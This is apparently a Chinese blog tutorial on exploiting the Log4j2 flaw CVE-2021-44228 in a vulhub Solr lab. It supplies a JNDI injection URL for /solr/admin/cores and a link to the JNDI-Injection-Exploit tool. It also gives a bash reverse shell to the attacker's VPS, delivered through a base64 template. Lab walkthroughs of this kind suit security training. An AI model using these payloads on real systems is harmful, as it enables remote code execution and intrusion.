Log4j2漏洞vul-hub通关教程

启动环境:

1.首先我们来到我们的来到靶场这里博主是在自己的vps上面docker上面搭接的vul-hub启动环境输入我们的命令:

cd vulhub/log4j/CVE-2021-44228

docker-compose up -d显示这样就代表成功启动了。
2.然后我们输入我们vps的IP地址然后加上给的端口去浏览器访问,看到成功访问到了。

检查漏洞是否存在:

3.然后我们来验证漏洞,我们需要准备一个DNSlog平台来验证是否存在漏洞,

4.然后将上面dnslong给的后缀添加到这条命令末尾:/solr/admin/cores?action={jndi:ldap://{sys:java.version}.0jhatp.dnslog.cn},然后拼接在原网站后面去访问。

5.去dnslog平台点击一下刷新就可以看到带出来的信息了。说明存在漏洞!!!

漏洞利用:

6.然后我们直接新建一个主机,并且监听端口

下载安装JDNI:

项目地址:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

反弹shell

7.然后将我们反弹shell的命令经过bae64编码后填入我们的代码模板执行。

反弹shell命令:bash -i >& /dev/tcp/自己的vpsIP/端口 0>&1

命令模板:
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c
{echo,经过base64编码后的命令}|{base64,-d}|bash" -A 你的vpsip

执行后:

8.然后将生成的恶意代码类插入命令模板后面。命令模板:/solr/admin/cores?action=${jndi:填充}

9.然后将命令拼接在url后面访问即可

10.连接成功后去我们监听的那个机器就可以执行命令了。

相关推荐
cfm_29142 天前
SpringBoot MockMvc
spring boot·后端·log4j
天真的银耳汤3 天前
01 静态分析(Static Analysis)
log4j
周杰伦fans24 天前
记一次 Visual Studio 突然报错“未能加载 Microsoft.Internal.VisualStudio.Interop”的奇葩经历
microsoft·log4j·visual studio
laplaya25 天前
C++大型项目组件通信与依赖管理实践
c++·log4j·apache
福大大架构师每日一题25 天前
ollama v0.30.7 正式发布:Hermes 桌面端落地,接口、文档、底层依赖全方位优化
golang·log4j
四问四不知1 个月前
Understand Anything的初步了解
log4j
wh_xia_jun1 个月前
单元测试 + Mockito 开发指南
oracle·单元测试·log4j
kTR2hD1qb1 个月前
Privaze源码级避坑指南技术文章大纲
log4j
阿正的梦工坊1 个月前
【Rust】10-Cargo、测试与实用开发工作流
java·rust·log4j
捏塔1 个月前
完美自动生成单元测试SKILL
单元测试·log4j